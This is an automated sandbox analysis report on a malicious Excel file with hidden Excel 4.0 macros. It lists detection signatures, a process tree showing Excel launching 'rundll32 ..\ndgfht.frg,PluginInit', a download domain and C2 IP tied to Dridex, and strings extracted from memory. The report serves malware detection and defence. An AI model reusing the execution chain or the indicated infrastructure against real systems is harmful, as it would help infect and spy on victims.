Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Documents_460000622_1464906353.xls

Overview

General Information

Sample Name:Documents_460000622_1464906353.xls
Analysis ID:383422
MD5:bcd540201ec5e0301816d194bb15ec30
SHA1:e5ca3f6cbb69736c904ff77f7ab6514fc48153a3
SHA256:a83ce7af997c7514b9faa386fde353ce094e7ef5bfc31dfb52dc9f5d7cfee43e
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2004 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2536 cmdline: rundll32 ..\ndgfht.frg,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 1108 cmdline: rundll32 ..\ndgfht.frg,PluginInit MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • cmd.exe (PID: 3032 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Documents_460000622_1464906353.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x165b8:$e1: Enable Editing
  • 0x16302:$e3: Enable editing
  • 0x163d4:$e4: Enable content
Documents_460000622_1464906353.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: rundll32.exe PID: 1108JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: unknownHTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2
      Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
      Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
      Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
      Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
      Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77F61E FindFirstFileExW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E802EC8 FindFirstFileExA,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E803336 FindFirstFileExA,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E803361 FindFirstFileExW,

      Software Vulnerabilities:

      barindex
      Document exploit detected (creates forbidden files)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dllJump to behavior
      Document exploit detected (drops PE files)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: ohior[1].dll.0.drJump to dropped file
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
      Source: global trafficDNS query: name: whiskyexpanse.com
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.3.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.3.47:443

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 52.12.4.186:443 -> 192.168.2.22:49170
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\585D4361.emfJump to behavior
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: unknownDNS traffic detected: queries for: whiskyexpanse.com
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: rundll32.exe, 00000004.00000003.2170206106.0000000000335000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?f47754d4c3434
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
      Source: rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.passport.com
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
